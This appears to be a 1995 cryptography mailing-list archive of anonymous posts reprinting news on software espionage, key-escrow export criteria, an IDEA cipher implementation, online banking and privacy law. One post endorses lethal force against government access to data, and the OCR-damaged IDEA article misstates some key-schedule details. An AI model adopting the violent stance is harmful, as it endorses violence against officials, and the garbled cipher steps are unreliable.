called Load Runner. In June 1995, a senior Mercury Interactive
official, Graham Burnette, allegedly wrote to Performix
inquiring about a possible corporate alliance to develop
load-testing software. Performix spurned the offer.
Around the same time, a Virginia businessman named Joel
Dietrich, president of an obscure company called Styx Systems,
approached Performix asking to try out a version of Empower
known as Empower/CS on behalf of an anonymous client.
According to Performix, Mr. Dietrich said he couldn't identify
the client because it was a federal government intelligence
agency. On June 16 Performix granted Mr. Dietrich and Styx a
short-term license to use Empower/CS.
At 1:55 a.m. on Saturday, July 29, Performix received a most
curious e-mail message over the Internet. The message
indicated that someone who wasn't authorized to do so was
trying to install Empower/CS on a large computer and examine
its "source codes" -- the software's secret programming
language. A feature Performix had embedded in Empower/CS
automatically causes an e-mail alert to be sent to Performix
whenever there are indications the software is being used
The e-mail indicated the address from which it had been sent:
"merc-int.com." This is the registered Internet address of
Mercury Interactive.
The e-mail also gave the name of the network on which someone
was installing the copy of Empower/CS: "testrun.mercury."
The license number of the software apparently now in Mercury
Interactive's hands, the e-mail further indicated, was the
license number of the copy that had been leased to Styx.
While Mercury Interactive and Mr. Dietrich have disavowed any
knowledge of a possible software transfer, Mercury
Interactive's Mr. Burnette acknowledged in an interview that
Mr. Dietrich's daughter and son-in-law work for Mercury
In mid-August, in U.S. District Court in Alexandria, Va.,
Performix sued Mercury Interactive, Styx and Dietrich,
alleging copyright infringement, fraud, conversion, unfair
competition, breach of contract and unjust enrichment.
Performix alleges Mercury Interactive "acquired Empower/CS so
that it could unlawfully, willfully and maliciously copy, use
and/or reverse engineer Empower/CS for the purpose of
improving the performance and features of existing Mercury
Interactive products in an attempt to gain significant
economic advantage."
Mercury Interactive hasn't yet formally responded to the
allegations, but Mr. Burnette denied any wrongdoing by the
company. "Mercury Interactive has a very strong policy against
industrial espionage," he said. "We don't do it."
Mr. Dietrich's response filed with the court has raised some
eyebrows. While claiming no knowledge of any transfer to
Mercury, he hasn't backed away from his claim to be working
for the federal government. Indeed, Mr. Dietrich is asserting
that he is immune from the suit because he was acting as an
agent of the U.S. government. He claims in court papers that
he obtained the software on behalf of "a classified government
None of the parties to the case who were willing to be
interviewed said they knew the identity of the agency, and Mr.
Dietrich didn't respond to interview requests. However, Mr.
Burnette of Mercury Interactive said: "I know that Mr.
Dietrich works as a contractor for a government agency. I know
it's a secret government agency, but I don't know what it is."
Officials of both Mercury Interactive and Performix said the
two firms have reached a tentative settlement, although they
disagree on what it contains. "Everything Performix needed
from a business perspective they received, including the
ability to review Mercury Interactive product releases," said
Performix attorney Nelson Blitz. In addition, "money will be
paid to Performix under this agreement in principle." But Mr.
Burnette asserted that no money would change hands.
The penultimate turn: Mr. Burnette claims that Performix is
eager to settle the case because it has a problem of its own.
He contends that it is illegal to secretly embed in commercial
software code a program that causes the customer's computer to
send out e-mail. Mr. Blitz of Performix denied there was
anything legally questionable about the practice and said
Mercury Interactive never raised that issue in settlement
negotiations. He also said the feature isn't intended to be a
spycatcher. Rather, he said, it is meant solely to help
clients who are improperly installing the product by alerting
Performix that they need help. Empower's documentation informs
customers of the feature, he added.
James Haggard, president of Vasco Data Security Inc., said the
purpose of such programs is ambiguous, and it would be hard to
rebut Performix's claim that the feature is merely meant to
serve the customer. He noted that Microsoft Corp.'s new
Windows 95 software contains a program that can send Microsoft
a report on the software products being used by those who sign
up for its on-line service albeit only with the users'
permission. While critics label it a means of economic
snooping, the company says the program simply helps it assist
"The concept of a program calling home of its own accord" is
controversial in the computer industry, said computer security
expert Samuel Bellovin of Bell Labs. "People tend to get very
upset when it happens," he said, because it can look as if the
software maker is spying on them.
The final twist: Performix last week agreed to be acquired by
Pure Software Inc., a publicly held firm as large as Mercury
Interactive-which now will be up against someone its own size.
[How many CompSecExp S. Bellovins o'BellLabs?]

@_date: 1995-10-26 16:53:36
@_author: Anonymous 
@_subject: Bill Gates on anonymity 
BEGIN QUOTE
I'm not suggesting we do away with all forms of anonymity. I can imagine electronic communities where anything goes and no one can trace the real origin of information - or verify its authenticity. You would enter such a community - by deciding to read or watch the information
posted there - at your own risk, and if people said offensive or untrue things to you, your only recourse would be to set the record straight in the same forum. Consenting adults should be entitled to participate in this kind of community. But kids certainly should not. END QUOTE
The full text is at

@_date: 1995-10-28 01:23:45
@_author: Anonymous 
@_subject: TWP Ups Net Freedom 
The Washington Post, October 27, 1995
Freedom of Net Speech (Editorial)
Is speech on the Internet like speech in a public square,
or is it more like speech in a privately owned mall,
where leafleters and demonstrators need permission? And
what about universities, where students using university
accounts for e-mail and other messages may find
themselves subjected to disciplinary rules? The latter
problem occurred most recently at Virginia Tech, which
has come under challenge for disciplining a student who
sent a letter described as abusive to another student.
The difficulty of framing such questions or even of
defining the terms they're made up of (Is cyberspace
really a "space," or just the ability of a lot of
machines to talk to one another?) should be ample
illustration of why millions of Internet users are still
sloshing around in a state of legal ambiguity. And that
ambiguity, though congenial to the anarchically inclined
folks who have been in cyberspace since its
not-very-remote beginnings, can't be sustained much
longer as millions of users pile into cyberspace through
commercial, university-owned and workplace hookups. The
providers of these hookups all have an interest in what
their users "say" to other users once they're on line,
but the interests vary. Some providers are afraid -- with
cause -- that they may be liable for pirated, libelous or
other lawbreaking material posted on their accounts, or
(depending on the outcome of assorted legislation) for
transmitting pornographic or indecent material to minors.
Universities have another set of motivations that go
beyond fear of legal vulnerability and that have led many

@_date: 1995-10-28 05:50:17
@_author: Anonymous 
@_subject: EE Times on IDEA 
Electronic Engineering Times
Oct 23, 1995 p. 66
T.R MADHUSUDAN SASTRY,
T. GANESAN, B.MADHUKAR
AND N. SRINIVASA
MOTOROLA INDIA ELECTRONICS Pvt. Ltd.
BANGALORE, INDIA
Time is right for a good, secure 'Idea'
Computers are the medium in which almost all of today's business deals and international transaction transpire. That calls for the development of secure systems, which protect data from being accessed by unautho-rized users. Digital Encryption Standard (DES) is a cipher system that uses a 64-bit-long secret key. With present comput-er technology, it is not difficult to break DES by trying all possible keys. That made cryptographers look for different encryption algorithms that take a long time for today's computers to break the code. The International Data Encryption Algorithm (Idea) is a private key-block ciphering scheme, which is computationally highly secure since it uses a 128-bit-long secret key. The brute force method of breaking the code, (trying all possible combinations as keys) would require 10^24 years for a chip that can test a billion keys per second. The design philosophy of Idea is to niix the operations from different algebraic groups to add confusion and di!
 ffusion to the input data. The operations are addition modulo, multiplication modulo, and exclusive OR (XOR).
We have implemented Idea in electronic-code-book (ECB) mode on the Motorola DSP 561xx family of processors. In ECB mode, a 64 bit input block is encrypted to generate a 64-bit output block that is transmitted to the receiver through insecure but error free channels. In Idea, all the algebraic operations work with 16-bit blocks of data. That makes the algorithm efficient on a 56 to DSP, which has a very good instructioln set to perform the addi-tion modulo 2^16, multiplication modulo 2^16 + 1 and 16-bit XOR operations.
The Idea is a block-cipher scheme in which the incoming data is divided into blocks of 64 bits and fed as input to the encryption algorithm (see figure). The 64 bit data X= (X1 X2 X3 . . . X64) is initially divided into 4 subblocks X1, X2, X3 and X4each of 16 bits. These four sub-blocks become input for the first round of operation. In each round, each subblock is added and multiplied under modulo fields with key subblocks, thus adding more confusion and diision.
The sequence of operations for the first round is given below; it's the same for all rounds of operations except for different key subblocks.
[1] Multiply X1 and Kl, (first key subblock Zl^l) under modulo 2^16 + 1
[2] Add X2 and K2 (Z2^1) under modulo 2^16
[3] Add X3 and K3 under modulo 2^16  [4] Multiply X4 and K4 under modulo 2^16 + 1
[5] XOR the results of step 1 and step 3
[6] XOR the results of step 2 and step 4
[7] Multiply the results of step 5 and K5 under modulo 2^l6 + 1
[8] Add the results of step 6 and step 7
[9] Multiply the re sults of step 8 and K6 under modulo 2^16 + 1 .
[10] Add the results of step 7 and step 9 under modulo 2^16
[11] XOR the results of step 1 and step 9
[12] XOR the results of step 3 and step 9
[13] XOR the results of step 2 and step 10
[14] XOR the results of step 4 and step 10
The results of each round from steps 11, 12, 13, and 14 form the  input blocks for the second round of opera-
tion after swapping the two inner blocks (see figure). After eight rounds are over, the following transformation has to be done before taking output cipher text. It should be noted that swapping is not done for the
last round.
[1] Multiply X1 and the 49th key subblock K49 (Z1^9)
[2] Add X2 and the 50th key subblock to k50 (Z2^9)
[3] Add X3 and the 51st key subblock k51 (Z3^9)
[4] Multiply X4 and the 52nd key subblock K51(Z3^9)
The decryption algorithm is also exactly the same except for the change in the subblock keys. From each of the key subblocks in the encryption, either additive inverse or multipli
cative inverse is used. For example, the subblock key used to multiply this data subblock is re placed with its multiplicative inverse. Also the order in which that multiplicative and additive inverse occurs in the decryption algorithm takes care of the shuffling of the intermediate data subblocks.
As stated earlier the encryption key is 128 bits long. The 52 encryption subblock keys are derived from the encryption key, and the corresponding subblock keys are derived from the encryption-key subblocks. The key subblocks for the first round of encryption are derived by dividing the 128-bit-long key into 16-bit blocks. Then, for every next round, the encryption key is circularly shifted by 25 bits and then divided into 16-bit blocks to yield encryption-key subblocks. In the last round, only the first four key subblocks are generated.
The Idea can be implemented in all three modes of operation: ECB, output-feedback mode (OFB) and cipher-feedback mode (CFB). In ECB, the input is split into 64-bit blocks, encrypted and transmitted. In CFB, the output cipher text from one block of encryption is used to form part of in input block. And the output of the algorithm is XORed with the input plain text, and transmitted. Similarly, the feedback is taken after
the XORing operation. In thepresent implementation, only ECB mode is done, which is the fastest among the three.
Since all the operations are on 16-bit blocks, the powerful instruction set of 561xx can beused for efficient implementation. The modulo 2^16 + 1 multiplication operation is used many times, and it is computationally intensive when compared with XOR and modulo 2^16 addition. The fixed-point multiplication construction of 561xx can be utilized to perform 32-bit multiplication.
The modulo 2^16 addition operation can be done just by ignoring the carry of 16-bit addition in 561xx. The XOR operation is also supported in one instruction as in any other DSP processor. Hence all three algebraic operations can be implemented efficiently using the instruction set of 561xx
Again the decryption algorithm is exactly the same as the encryption algorithm, except, that the decryption-key sub block is used instead of encryption. The whole program can be reused for decryption by changing the input variables and output variables.
Circular shift The main computation in encryption-key subblock generation is the circular shift of the l28-bit-long key. The encryption key can be stored as eight words in memory. In the present implementation, instead of shifting the key circularly, the mask patterns are used to pick up suitable key subblocks. That is, the second set of eight key subblocks can be generated by picking up 16 bits from the ninth bit of the second word of the encryption key.                 Hence, for each round, we need to multiply each encryption key word by a suitable mask pattern, and left shift it with a suitable number of bits. The left-shifting operation for any arbitrary number of bits can be performed using the integer multiplication. Storing the mask patterns can be eliminated by using the shifted version
of left-shift constants as right-shift constants. The left-shift constant is multiplied with the current encryption-key word, and the right-shift constant is multiplied with the next keyword, and both are combined to
generate one key subblock. The right-shift constants are gotten by right shifting the left shift constant by 1 bit, which considerably reduces the computation involved. The current implementation of Idea in ECB on Motorola's DSP 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex mode. That is 3.6
times faster than using the DES algorithm.

@_date: 1995-10-31 22:15:13
@_author: Anonymous 
@_subject: Smart Snoops 
Wall Street Journal, October 30, 1995, p. B3.
Netcom to Use Smart Switches For the Internet
By Audrey Choi
Internet provider Netcom On-Line Communication Services Inc.
said it will use high-speed network switches from Cascade
Communicaffons Corp. in a move to upgrade the speed and
flexibility of its Internet services.
Netcom's decision represents a significant endorsement for
Cascade, a small Westford, Mass.-based company whose revenues
have soared along the rapid growth of the Internet. In
addition to Netcom, Cascade also is supplying switching
devices, which control the flow of information across a
far-flung computer network, to UUNet Technologies Inc. and
Performance Systems International Inc.
To prepare for an expected rise in the number of users,
networking analysts say the Internet needs to move toward a
more efficient architecture based on high-speed intelligent
switches, like Cascade's, which not only allow large volumes
of data to be transmitted quickly, but also offer Internet
service providers the ability to track and manage the data
being transported.
Brad Meinert, senior analyst at research firm Input, says the
tremendous growth of the World Wide Web, a graphics Internet
interface, "is putting increased capacity demands for greater
bandwidth on the Internet infrastructure."
In the past, the Internet depended primarily on simpler
router-based wide-area networks that provided access to users
with dial-up modems and leased lines. Bundles of data moving
over this kind of network is evaluated and processed at each
router until it arrives at its destination -- a tedious
process that can adversely affect time-sensitive applications,
such as video conferencing.
"We've been talking about an information super highway, but
our infrastructure is really just dirt roads," said Daniel E.
Smith, Cascade's president and chief executive. Mr. Meinert
noted that "switching is clearly the next generation, which
allows you to create the virtual network."
Financial details of the Netcom deal weren't disclosed, but
Cascade's Mr. Smith said the deals with the three major
Internet providers initially represents "tens of millions of
dollars" of business. UUNet said it has purchased $6.5 million
worth of Cascade products.
Cascade's switches provide the highest port density and
highest network capacity, analysts say. Its switches range in
cost from $25,000 to $250,000 and enable a far greater number
of users to access the Internet through any one point. While
a typical router may be able to handle 20 to 50 users, a
single Cascade switch can accommodate 1,000 users, says Desh
Deshpande, Cascade's founder and marketing vice president.
Additionally, the management capabilities of the smart
switches enable Internet providers to track how many data
bundles a customer sends, where each bundle is at any point in
time, and what priority on the network they should be given.

@_date: 1995-10-31 22:22:07
@_author: Anonymous 
@_subject: Virtual Security Jitters 
Financial Times, October 30, 1995, p. 13.
Online bank era dawns
By Louise Kehoe
The Security First Network Bank established by Cardinal
Bancshares -- a small Kentucky savings and loan institution is
the first financial institution to conduct true online banking
over the Internet.
SFNB's pioneering effort may influence the growth of Internet
banking. Larger financial institutions are watching for clues
as to how consumers respond and to see whether the cyberbank
can live up to its "Security First" name.
Concerns about Internet security exacerbated by incidents in
which supposedly secure software has proven vulnerable -- have
made banks cautious. SFNB claims to have created a "virtual
vault" for each customer account, using a "trusted" computer
operating system from Hewlett-Packard the second largest US
computer company, as well as encryption and user
authentification software, and firewalls.
"We have overcome the problem that has prevented banks from
transacting over the Internet," said James Mahan, SFNB's
Perhaps cyberbanking's biggest draw is that the SFNB is open
24 hours a day, seven days a week. Customers will be able to
conduct standard personal banking tasks such as paying bills,
transferring funds from one account to another and checking
the balance of an account.
Nor are there queues at the counters in the "virtual lobby" of
the SFNB which are staffed by computer renditions of
R2D2-style robots (
But waiting for images to download from the Internet over a
modem may persuade users that a bus trip to their local bank
is not such a bad idea.
SFNB also faces competition from more than 20 US banks
including Chemical Bank, Wells Fargo and First Interstate that
have formed partnerships with Intuit, the leading personal
finance software company, to enable users of the popular
Quicken program to access information from their accounts and
pay bills electronically.
Services offering stock prices, information about mortgages,
loans and retirement funds as well as insurance are
Some of the most innovative include BankAmerica's new Web site
which opened a week ago with an invitation to users to "build
your own bank". By filling in a form, users can tailor the
information presented to fit their interests.
A student, for example, might be presented with information
about obtaining loans for college fees. Someone close to
retirement age would automatically be routed to information
more relevant to his interests.
One of the largest mortgage lenders in the US, Bank of
America, has also chosen to put an emphasis on property
purchases at its Web site.
Hyperlinks to real estate firms throughout the US enable users
to search through lists of homes for sale and then to link
back to the bank in order to apply for financing
Among the biggest attractions of the Internet for consumers,
including consumers of financial services, is the ability to
"shop around" so as to compare costs and advantages.
The insurance industry is taking this to heart in a new
service that goes live today. Insweb will enable consumers to
seek quotes from a range of companies and brokers on life,
home, car and medical insuranee.
The service, established by a group of 25 insuranee companies
and related organisations is the first "marketplace" on the
Internet for insurance information and commerce.
Insweb plans to enable users to purchase insurance online. In
a pilot program next month, residents of the state of Utah
will be able to buy car insurance via the Internet
Internet Law Review is a monthy paid-for publication available
electronically or on hard copy from December. Among other
issues, it will cover IT-law and the Internet; commercial
security and encryption, using contributors from North America
and Europe. Subscription is $220 a year and details are
available from . Meanwhile,
details of this week's Internet Law Symposium in Seattle are
available at .

@_date: 1995-11-01 05:48:31
@_author: Anonymous 
@_subject: InfoWar 
The Wall Street Journal, October 31, 1995, p. B1.
It's Time You Became A Manager of Change, The Consultants Say
Rapid innovation and product introduction require a nimbleness
lacking in many corporate bureaucracies.
"There's an intrinsic need to improve your effectiveness at
managing change -- whatever form it takes," says David Nadler,
chairman of the New York-based Delta Consulting Group.
Change-management boosters are also telling managers to learn
about "knowledge management" as a means of achieving their new
Knowledge management attempts to make fuller use of internal
information networks. The consulting units of Arthur Andersen,
Ernst & Young and Price Waterhouse are peddling systems to
collect, store and distribute knowledge. Andersen designates
"knowledge managers" who monitor traffic through its Lotus
Notes e-mail software and store valuable information on a CD-
ROM. The disk contains 16,000 pages on everything from
performance measurements to employee motivation.
One problem with the system: "It's so difficult to tie
knowledge-management systems to bottom-line improvement," says
C. Jack Grayson Jr., whose American Productivity and Quality
Center co-sponsored a knowledge-management symposium with
Arthur Andersen. "That just feeds suspicions that it's just
another fad."
It's also difficult to get employees to contribute to the
information pool [fearful their jobs may vanish after overt
knowledge-transfer, hence, the appeal to managers for systems
that covertly siphon knowledge and record grounds for
WSJ, October 24, 1995, p. A24.
Privacy Laws Are Lax On New Technology, Federal Agency Says Washington -- Inconsistent privacy laws let companies sell
sensitive information about consumers who use new
communications technologies, the Clinton administration
In a report, the Commerce Department's National
Telecommunications and Information Administration called on
communications companies to tell customers if they plan to
sell information about what they watch or whom they call, and
to make it easy for customers to squelch the disclosure of
sensitive information.
Federal regulations allow people to ask their phone company to
keep information confidential, but the rule generally doesn't
apply to small phone companies or wireless phones, according
to the report. Laws that prevent video stores from disclosing
what movies customers watch don't apply to pay-per-view
services by satellite-television providers. And while a 1986
law prevents on-line computer services from snooping into
electronic mail, it doesn't prevent the services from selling
information about who e-mailed whom, and what the topic was,
the report noted.
The Commerce Department stopped short of calling for
legislation to close the gaps. But "if industry doesn't do it,
consumers will demand that the government do it," predicted
Larry Irving, assistant commerce secretary for communications
and information.
Industry representatives played down the privacy loopholes.
Ronald Plesser, a Washington attorney who represents online
services and direct marketing firms, said, "I know of no
example of anybody trafficking in e-mail descriptions." A
spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
do not release names of customers that ordered movies.

@_date: 1995-09-01 18:30:25
@_author: Anonymous 
@_subject: Key Escrow Workshop agenda & discussion paper 3 
Key Escrow Workshop agenda & discussion paper 3
September 1, 1995
Dear Participant:
Thank you for agreeing to participate in the two-day
meeting on software key escrow encryption.  We are
anxious to work with you and other industry
representatives to facilitate development of exportable
key escrow encryption in software products.  I look
forward to the workshop being an important step in that
I have attached a draft agenda for the two days.  I
propose that we spend the majority of our time discussing
a set of export criteria.  In order to move that
discussion along, a draft set of criteria is attached. The criteria state, in general terms, the government's
needs with respect to exportable software, consistent
with its law enforcement and national security
requirements.  Since it is important that the final
criteria be clear, straightforward, consistent, and
implementable, Mike Nelson of the Office of Science and
Technology Policy will spend a few minutes describing
these criteria on the first morning of the meeting. After that, we would like to hear your perspectives on
them and work with you to refine them.  On the second
day, we plan to discuss the export licensing process for
such products, and begin exploring characteristics of
acceptable key escrow agents.
Again, thank you for your participation.  I look forward
to seeing you there.
Raymond G. Kammer
Deputy Director
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper Export Criteria Discussion Draft -- 64-bit Software Key
Escrow Encryption
As discussed at the SPA/AEA meeting on August 17, 1995,
the Administration is willing to allow the export of
software encryption provided that the products use
algorithms with key space that does not exceed 64 bits
and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents. On the same date,
the September 6-7 key escrow issues meeting at NIST was
also announced.  The two principal topics at the meeting
will be:  discussion of issues of exportability of 64-bit
software key escrow encryption and 2) desirable
characteristics for key escrow agents.
In order to help make most productive use of the limited
time available at the upcoming meeting and to better
focus deliberation, the following criteria are being
distributed for discussion purposes.  Since it is
important that final criteria be clear, straightforward,
consistent, and implementable, please review these draft
criteria and be prepared to discuss how they may be
refined and made more specific.
Draft Export Criteria for Software Key Escrow Encryption
Software key escrow encryption products meeting the
following criteria will be granted special export
licensing treatment similar to that afforded other
mass-market software products with encryption.
1.   The product will use an unclassified encryption
     algorithm (e.g., DES, RC4) with a key length not to
     exceed 64 bits.
2.   The product shall be designed to prevent multiple      encryption (e.g., triple-DES).
3.   The key required to decrypt each message or file
     shall be accessible through a key escrow mechanism
     in the product, and such keys will be escrowed
     during manufacture in accordance with   If such
     keys are not escrowed during manufacture, the
     product shall be inoperable until the key is
     escrowed in accordance with 4.   The key escrow mechanism shall be designed to
     include with each encrypted message or file, in a
     format accessible by authorized entities, the
     identity of the key escrow agent(s), and
     information sufficient for the escrow agent(s) to
     identify the key or key components required to
     decrypt that message.
5.   The product shall be resistant to any alteration
     that would disable or circumvent the key escrow
     mechanism, to include being designed so that the
     key escrow mechanism cannot be disabled by a static
     patch, (i.e., the replacement of a block of code by
     a modified block).
6.   The product shall not decrypt messages or files
     encrypted by non-escrowed products, including
     products whose key escrow mechanisms have been
     altered or disabled.
7.   The key escrow mechanism allows access to a user's
     encrypted information regardless of whether that
     user is the sender or the intended recipient of the
     encrypted information.
8.   The key escrow mechanism shall not require repeated
     involvement by the escrow agents for the recovery
     of multiple decryption keys during the period of
     authorized access.
9.   In the event any such product is or may be
     available in the United States, each production
     copy of the software shall either have a unique key
     required for decrypting messages or files that is
     escrowed in accordance with  or have the
     capability for its escrow mechanism to be rekeyed
     and any new key to be escrowed in accordance with
     10.  The product shall accept escrow of its key(s) only
     with escrow agents certified by the U.S. Government
     or by foreign governments with which the U.S.
     Government has formal agreements consistent with
     U.S. law enforcement and national security
     requirements.
Note: Software products incorporating additional
encryption methods other than key escrow encryption
methods will be evaluated for export on the basis of each
encryption method included, as is already the case with
existing products. Accordingly, these criteria apply only
to the key escrow encryption method incorporated by a
software product, and not to other non-escrowed
encryption methods it may incorporate.  For instance,
non-escrowed encryption using a key length of 40 bits
or less will continue to be exportable under existing
export regulations.
- - -
Please also review discussion paper  (distributed
earlier), which raises a number of issues involving
exportability criteria and how exportable products could
be designed.  Discussion paper  (also previously
distributed) presents questions involving key escrow
Note:  These issues will be discussed at the Key Escrow
Issues Meeting to be held September 6-7, 1995 (9:00 a.m.
- 5:00 p.m.) at the National Institute of Standards and
Technology (Gaithersburg, Maryland).  The meeting will be
open to the public, although seating is limited.  Advance
registration is requested, please contact Arlene Carlton
on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton at micf.nist.gov.
9/1/95

@_date: 1995-09-07 21:50:51
@_author: Anonymous 
@_subject: GAK 
In article ,
Speaking only for myself, I would resist government access to my data or
property. Court orderd warrant or not. I firmly believe that the majority
of "lawful" acts the goverment in its various incarnations commits every
day is in violation of not only the US Constitution, but of the natural
rights given to me as part of my humanity. I therefore hold that I have
right, if not the duty, to resists these acts in anyway possible, upto and
including the use of lethal force. The number of citizens who share this
opininon are growing every day.
--anon, due to the denoucement of the Bill of Rights by the criminals in
high office.

@_date: 1995-09-08 07:35:28
@_author: Anonymous 
@_subject: Cryptography Global Challenges 
International Cryptography Institute 1995
Global Challenges
Thursday-Friday September 21-22, 1995
Presented by
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., N.W.
Washington, D.C. 20006
Fax: (202) 296-4098
President James P. Chandler Emeritus Professor of Law
The International Cryptography Institute will address the
cryptography challenges associated with meeting the
information protection needs of users and the law
enforcement and national security needs of nations.
Topics to be covered include national and international
cryptography policies and regulations, international
requirements and approaches, commercial cryptography,
privacy and trust, key escrow encryption, busines
requirements, law enforcement requirements, and the use
of cryptography with electronic payments.
Keynote Speaker
FBI Director Louis J. Freeh
September 21, 1995
8:30-9:00     Welcome and Opening Remarks
              James Chandler, President, National
              Intellectual Property Law Institute
              Dorothy E. Denning, Chair of Program
              David Kahn, Visiting Historian, National
              Security Agency, U. S.
9:00-9:40     Cryptography in Business
              M. Blake Greenlee, U.S.
9:40-10:20    Commercial Use of Cryptography
              Nick Mansfield, Shell International, The
              Netherlands
10:20-10:50   Break
10:50-11:20   Computer Industry Position on Privacy and
              Trust in an Information Society
              Yves Le Roux, Digital Equipment
              Corporation, France
11:20-12:00   The International Cryptography Experiment
              and Worldwide Cryptographic Products
              Survey
              David Balenson, Trusted Information
              Systems, Inc., U.S.
12:00-12:30   Export Controls on Encryption Software
              Ira Rubenstein, Microsoft Corp., U.S.
12:30-2:00    Lunch with Keynote
              Louis J. Freeh, Director, Federal Bureau
              of Investigation
2:00-3:00     Cryptography and the Information Society:
              Recent Developments in the European Union
              David J. Gould, Cabinet Office, UK
3:00-3:30     Encryption Policy and Technology in Japan
              Mitsuru Iwamura, The Bank of Japan, Japan
3:30-3:50     Break
3:50-4:30     Towards an Australian Policy on Encryption
              Peter Ford, Attomey General's Department,
              Australia
4:30-5:00     New National Encryption Policies and
              Regulations in Russia
              Anatoly Ledbeder, LAN Crypto Ltd., Russia
5:00-6:00     International Regulation of Cryptography:
              An Update
              James Chandler, National Intellectual
              Property Law Institute, US.
5:30-6:30     Reception
September 22
8:30-9:20     U.S. Government Cryptography Policy
              Michael R. Nelson, Office of Science and
              Technology Policy, US.
              Ronald D. Lee, National Security Agency,
              US.
9:20-10:10    Law Enforcement Requirements for
              Encryption
              William E. Baugh, Jr., Edward L. Allen,
              Michael D. Gilmore, Federal Bureau of
              Investigation, US.
10:10-10:40   Break
10:40-11:20   Intemational Key Escrow Encryption
              Dorothy E. Denning, Georgetown University,
              US.
11:20-12:00   Transnational Key Escrow
              Henry H. Perritt, Jr., Villanova
              University School of Law, US.
12:00-1:30    Lunch
1:30-3:00     Commercial and International Key Escrow
              Stewart A. Baker, Steptoe & Johnson, US.,
              moderator
              Stephen T. Walker, Trusted Information
              Systerns, Inc, US.
              Frank Sudia, Bankers Trust Company, US.
              Carmi Gressel and Itai Dror
              Fortress U & T Ltd., Israel
3:00-3:20     Break
3:20-4:00     Billing and Paying Over the Internet
              Dan Schutzer, Citibank, US.
Faculty Chair
Dr Dorothy Denning
Mr. Edward L. Allen
Supervisory Special Agent
Federal Bureau of Investigation
Mr. Stewart Abercrombie Baker
Steptoe & Johnson
Mr. David Balenson
Senior Computer Scientist
Trusted Information Systems, Inc.
Mr. Wllliam E. Baugh, Jr.
Assistant Director,
Information Resources Division
Dr. Ernest F. Brickell
Vice President
Bankers Trust Electronic Commerce
c/o Sandia National Labs Applied Math Dept.
Prof. James Chandler
National Intellectual Property Law Institute
Dr. Dorothy E. Denning
Computer Science Department
Georgetown University
Mr. Peter Ford
First Assistant Secretary, Security Division
Attorney General's Department
Mr. Louis J. Freeh, Director
Federal Bureau of Investigation
Mr. Michael D. Gilmore
Supervisory Special Agent
Federal Bureau of Investigation
Engineering Research Facility
Mr. David J. Gould
Under Secretary of State
Overseas and Defence Secretariat
Cabinet Office, London
Mr. M. Blake Greenlee
M. Blake Greenlee Associates. Ltd.
Dr. Carmi Gressel
Engineering Manager
Fortress U & T, Ltd.
Mr. David Kahn
Visiting Historian
National Security Agency,
and author, "The Codebreakers"
Dr. Anotoly Lebedev
LAN Crypto, Ltd.
Mr. Mitsuru Iwamura
Chief Manager
Institute for Monetary and Economic Studies
The Bank of Japan
Mr. Ronald D. Lee
General Counsel
National Security Agency
Mr. Yves Le Roux
Central Engineering, Security Program
Digital Equipment Corp.
Mr. Nick Mansfield
Shell International Petroleum Mattschappij B.V.
The Hague
The Netherlands
Mr. Michael R. Nelson
Special Assistant, Information Technology
White House Office of Science and Technology Policy
Old Executive Office Building. Washington DC 20506
Mr. Henry H. Perritt, Jr.
Professor of Law
Villanova University School of Law
Villanova, PA 19085
Mr. Ira Rubinstein
Senior Corporate Attorney
Microsoft Corp
Redmond, WA 98052
Dr. Dan Schutzer
Vice President
Dr. Frank Sudia
Vice President
BT Electronics Commerce
Bankers Trust Co., New York
Mr. Stephen T. Walker
Trusted Information Systems, Inc.
Location and Fees
ICI '95 will be held at the National Intellectual
Property Law Institute, 1815 Pennsylvania Ave.,
Washington, DC, third floor.
Registration is $695 before September 1 and $795
thereafter ($395/495 for U.S. Government). Payment
includes all conference materials, two lunches, and a
cocktail reception.
Cancellations Fees: All registration is subject to a $50
fee. Tuition will not be refunded if notice of
cancellation is received after September 1. 1995, but a
substitute attendee may be sent. Postmarks will not be
considered in determining timeliness of receipt.
Hotel Accommodations: A limited block of rooms has been
reserved at the Wyndam Bristol. However, registrants must
make their own hotel reservations and indicate that they
are attending the International Cryptography Institute
1995. Room reservations may be made by calling or writing
the Wyndam Bristol Hotel, 2430 Pennsylvania Ave.. N.W.
Washington, D.C. 20006 (202) 955-6000.
CLE Credit: CLE credit in mandatory states will be
applied for as requested.
Course Registration Form
Name: Organization: Fee:                    General            US. Gov't
Before 9/1/95           $695               $395
After 9/1/95            $795               $495
Payment (check one) Check payable to The National
Intellectual Property Law Institute
_______ Master Card           ________VISA
Card #
Expiration Date:
Registration by Fax: 800-304-MIND  Phone:  800-301-MIND                      202-296 4098          202-842-48000
Mail Registration with payment to:
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., NW, Suite 300
Washington, DC 20006

@_date: 1995-09-08 09:48:43
@_author: Anonymous 
@_subject: Info Warthogs 
Future Information Warfare Study Available
San Francisco, Sept. 6, 1995 -- Computer Security
Institute's "Special Report on Information Warfare"
describes how war might be fought in the 21st century.
The report will appear in the fall issue of the Computer
Security Journal, but is available now on request.
Patrice Rapalus, director of Computer Security Institute
(CSI), told Newsbytes, "In recent weeks, mass media
organizations such as Time Magazine, the Washington Post,
and National Public Radio have done stories on
information warfare. This report is a timely,
comprehensive and practical study on information warfare
and its impact on our future."
The report defines information warfare in contrast to
simple computer crime, "A computer crime is an act that
violates a law. It could be specifically targeted. It
could be isolated, or it could be one element of an
overall plan of attack. The conduct of information
warfare, in contrast, is never random or isolated (and
may not even violate a law). The term implies a concerted
effort to utilize information as a weapon with which to
wage war, whether on an actual battlefield or in
economic, political, or social arenas."
Four aspects of information warfare are listed in the
report: the electronic battlefield; infrastructure
attacks; industrial espionage; and personal privacy
"It is important to understand that the term 'information
warfare' originated in the military and in its purest
sense refers to the grim and dangerous business of
real...country shattering war,"  says the report.
Computer Security Institute is located in San Francisco,
California, and is a wholly owned subsidiary of Miller
Freeman Publishing. Miller Freeman publishes over fifty
trade magazines including Dr. Dobbs Journal, Unix Review,
and LAN Magazine.
Computer Security Institute publishes, along with random
studies like the "Special Report on Information Warfare,"
a monthly newsletter, a semi-annual Journal, an annual
Buyers Guide, and a on-line bulletin board.
To obtain an advance copy of "Special Report on
Information Warfare," call 415-905-2310.
"Snooper" Software Digs Into Computers
